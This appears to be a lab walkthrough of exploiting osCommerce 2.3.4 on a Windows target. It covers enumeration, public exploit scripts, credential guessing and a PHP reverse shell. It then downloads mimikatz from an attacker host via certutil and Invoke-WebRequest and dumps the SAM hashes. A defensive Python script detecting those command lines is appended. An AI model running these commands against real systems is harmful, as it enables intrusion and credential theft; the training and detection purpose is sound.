[Enumeration]
1. Port scanning
nmap -Pn <ip>
2. Service scanning
nmap -sV <ip>
There are 3 HTTP ports: 80, 443, and 8080.
3. Scan for SMB
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
There are 5 shares that I can use: ADMIN$, C$, IPC$, Users, and Windows.
There are 3 users: Administrator, Guest, and Lab.
4. Scan for vulnerabilities. There is something about “osCommerce”; I think it’s interesting.
5. Access HTTP ports
Port 80
http://<ip>
Port 443
https://<ip>
Port 8080
http://<ip>:8080
Port 443 and port 8080 are the same.
Access catalog/
Access /docs
6. Directory fuzzing
dirb http://<ip>
dirb https://<ip>
dirb http://<ip>:8080
There are results from port 8080.
Try to access phpmyadmin.
[Exploitation]
Search for osCommerce 2.3.4 exploits
searchsploit oscommerce 2.3.4
There are 2 Python exploits.
Copy both of them.
cp /usr/share/exploitdb/exploits/php/webapps/43191.py .
cp /usr/share/exploitdb/exploits/php/webapps/44374.py .
1. Let’s check 44374.py first, because it’s a remote code execution.
gedit 44374.py
Review the code; there are 3 lines that I have to edit.
Input target IP and reverse shell command.
Create listener
nc -lvp 8080
Run exploit
python 44374.py
Nothing happened.
Let’s review the code again. Access the path to check whether it exists.
The real path is “http://<ip>:8080/oscommerce-2.3.4”.
LOL, I forgot that it is on port 8080 and the path is “oscommerce-2.3.4”, not “oscommerce-2.3.4.1”.
Edit the code
Run the exploit
python 44374.py
Edit “system()”
Edit it to use “exec()” instead. Also, it’s a Windows machine, so I will use “dir” instead of “ls”.
Run the exploit
python 44374.py
Nothing with “dir”.
Change to “whoami”, still got nothing.
Let’s try a reverse shell with PowerShell.
Edit the code
Run the code, nothing happened
I’ll stop this for now. Let’s try the other script.
2. Let’s try 43191.py; review the code first.
gedit 43191.py
Try to run the command
python 43191.py
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
Seems like I need credentials.
I remember from the first exploit that the system installation seems not to be complete yet.
Let’s guess for credentials
admin:admin -> failed
admin:password -> failed
admin: (no password) -> failed
root: (no password) -> success
Failed result.
Successful result.
Continue
Input the data
Run script again
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
I need a PHP shell.
Let’s google “php shell for windows”. I found this one:
https://github.com/Dhayalanb/windows-php-reverse-shell
git clone https://github.com/Dhayalanb/windows-php-reverse-shell.git
Edit and save as shell.php
Since the payload is encoded using base64, I don’t want to edit it.
Let’s find a simpler one. I came across this:
https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
Edit from system() to exec() instead
Run the script
python 43191.py -u http://<ip>:8080/oscommerce-2.3.4 --auth=admin:admin -f shell.php
Let’s try the reverse shell using PowerShell.
I got the shell using the second command.
Finally!!! Now I have a shell.
[Question]
1. “Lab” user NTLM hash decrypted
Download mimikatz.exe
On our machine, in the mimikatz.exe directory:
python -m SimpleHTTPServer
In the shell:
Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exe
Nothing happened
Try another command
certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exe
dir
Run mimikatz.exe
.\mimikatz "lsadump::sam" exit
Crack the hash with CrackStation.
2. root.txt
Search through the Users directory. I found the file at “C:\Users\Administrator\Desktop”.
dir
cat root.txt.txt
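From a defender's view, the tool-transfer commands (certutil -urlcache, Invoke-WebRequest -OutFile) and the SAM dump (mimikatz lsadump::sam) in the [Question] section above are the noisiest part of this walkthrough in process-creation telemetry. The following is an added example, not part of the original write-up, that runs simple detection rules over constructed Sysmon-style command-line log lines; the log format, host name and attacker IP are assumptions.

```python
"""Detect the tool-transfer and credential-dump command lines from the
write-up in process-creation log lines. Log lines are constructed."""
import re

# Each rule: (name, regex over the command line). Case-insensitive,
# because Windows command lines are.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*https?://", re.I)),
    ("powershell_download_cradle",
     re.compile(r"Invoke-WebRequest\b.*(-OutFile|https?://)", re.I)),
    ("mimikatz_sam_dump",
     re.compile(r"lsadump::", re.I)),
]

# Constructed Sysmon-style (Event ID 1) lines: "<time> <user> <image> | <cmdline>"
SAMPLE_LOG = """\
2024-01-01T10:00:01Z LAB\\lab C:\\Windows\\System32\\certutil.exe | certutil.exe -urlcache -f http://10.0.0.5:8000/mimikatz.exe mimikatz.exe
2024-01-01T10:00:02Z LAB\\lab C:\\Windows\\System32\\certutil.exe | certutil -verifystore root
2024-01-01T10:00:03Z LAB\\lab C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | powershell Invoke-WebRequest -OutFile mimikatz.exe http://10.0.0.5:8000/mimikatz.exe
2024-01-01T10:00:04Z LAB\\lab C:\\inetpub\\wwwroot\\mimikatz.exe | .\\mimikatz "lsadump::sam" exit
2024-01-01T10:00:05Z LAB\\lab C:\\Windows\\System32\\cmd.exe | cmd /c dir C:\\Users
"""

def parse_line(line):
    """Split one constructed log line into (timestamp, user, image, cmdline)."""
    head, _, cmdline = line.partition(" | ")
    ts, user, image = head.split(" ", 2)
    return ts, user, image, cmdline.strip()

def detect(log_text):
    """Return [(timestamp, rule_name, cmdline)] for every line a rule matches."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _user, _image, cmdline = parse_line(line)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((ts, name, cmdline))
    return hits

if __name__ == "__main__":
    for ts, name, cmd in detect(SAMPLE_LOG):
        print(f"{ts} {name}: {cmd}")
```

The benign certutil -verifystore and cmd /c dir lines are left alone, which is the point: alert on the download and dump arguments, not on the binaries themselves.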